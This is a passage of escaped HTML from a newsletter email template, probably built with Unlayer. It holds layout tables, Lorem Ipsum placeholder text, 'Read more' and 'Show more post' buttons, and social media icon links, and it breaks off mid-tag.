style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 0px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"289\\\" style=\\\"width: 289px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-48p17\\\" style=\\\"max-width: 320px;min-width: 289.02px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1603388139490-863543\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 289.02px;\\\" width=\\\"289.02\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"310\\\" style=\\\"width: 310px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-51p83\\\" style=\\\"max-width: 320px;min-width: 310.98px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table id=\\\"u_content_text_27\\\" style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 0px 0px 20px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #db1908; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><strong>AUTMN COLLECTION<\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_28\\\" style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 10px 0px 20px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #1b2a2f; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 22px; line-height: 30.8px;\\\"><strong>COMBINING STYLES<\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 30px 10px 20px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #0e0f13; line-height: 160%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 160%;\\\"><span style=\\\"font-family: Lato, sans-serif; font-size: 14px; line-height: 22.4px;\\\">Lorem Ipsum is simply dummy text of the printing and typesetting industry. here are many variations of passages.<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_button_7\\\" style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 10px 20px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<div class=\\\"v-text-align\\\" align=\\\"left\\\">\\r\\n  <!--[if mso]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"border-spacing: 0; border-collapse: collapse; mso-table-lspace:0pt; mso-table-rspace:0pt;font-family:\'Open Sans\',sans-serif;\\\"><tr><td class=\\\"v-text-align\\\" style=\\\"font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\"><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"\\\" style=\\\"height:36px; v-text-anchor:middle; width:119px;\\\" arcsize=\\\"0%\\\" stroke=\\\"f\\\" fillcolor=\\\"#1b2a2f\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Open Sans\',sans-serif;\\\"><![endif]-->\\r\\n    <a href=\\\"\\\" target=\\\"_blank\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Open Sans\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #1b2a2f; border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;\\\">\\r\\n      <span class=\\\"v-padding\\\" style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><span style=\\\"font-size: 14px; line-height: 16.8px;\\\">READ MORE<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><\\/td><\\/tr><\\/table><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:30px 10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<div class=\\\"v-text-align\\\" align=\\\"center\\\">\\r\\n  <!--[if mso]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"border-spacing: 0; border-collapse: collapse; mso-table-lspace:0pt; mso-table-rspace:0pt;font-family:\'Open Sans\',sans-serif;\\\"><tr><td class=\\\"v-text-align\\\" style=\\\"font-family:\'Open Sans\',sans-serif;\\\" align=\\\"center\\\"><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"\\\" style=\\\"height:56px; v-text-anchor:middle; width:204px;\\\" arcsize=\\\"0%\\\" stroke=\\\"f\\\" fillcolor=\\\"#db1908\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Open Sans\',sans-serif;\\\"><![endif]-->\\r\\n    <a href=\\\"\\\" target=\\\"_blank\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Open Sans\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #db1908; border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;\\\">\\r\\n      <span class=\\\"v-padding\\\" style=\\\"display:block;padding:20px 40px;line-height:120%;\\\"><span style=\\\"font-size: 14px; line-height: 16.8px;\\\">SHOW MORE POST<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><\\/td><\\/tr><\\/table><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #1b2a2f\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #1b2a2f;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:30px 10px 10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #ffffff; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 20px; line-height: 28px;\\\"><strong><span style=\\\"line-height: 28px; font-size: 20px;\\\">1914 TRANSLATION BY H. RACKHAM <\\/span><\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 30px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #f5f5f5; line-height: 160%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 160%;\\\"><span style=\\\"font-family: Lato, sans-serif; font-size: 14px; line-height: 22.4px;\\\">Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur.<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #000000\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #000000;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:40px 10px 10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1603389173564-ff.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 251px;\\\" width=\\\"251\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 20px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<div align=\\\"center\\\">\\r\\n  <div style=\\\"display: table; max-width:147px;\\\">\\r\\n  <!--[if (mso)|(IE)]><table width=\\\"147\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"border-collapse:collapse;\\\" align=\\\"center\\\"><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"border-collapse:collapse; mso-table-lspace: 0pt;mso-table-rspace: 0pt; width:147px;\\\"><tr><![endif]-->\\r\\n  \\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 5px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 5px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/facebook.com\\/\\\" title=\\\"Facebook\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-black\\/facebook.png\\\" alt=\\\"Facebook\\\" title=\\\"Facebook\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 5px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 5px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/pinterest.com\\/\\\" title=\\\"Pinterest\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-black\\/pinterest.png\\\" alt=\\\"Pinterest\\\" title=\\\"Pinterest\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 5px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 5px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/linkedin.com\\/\\\" title=\\\"LinkedIn\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-black\\/linkedin.png\\\" alt=\\\"LinkedIn\\\" title=\\\"LinkedIn\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 0px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/twitter.com\\/\\\" title=\\\"Twitter\\\" 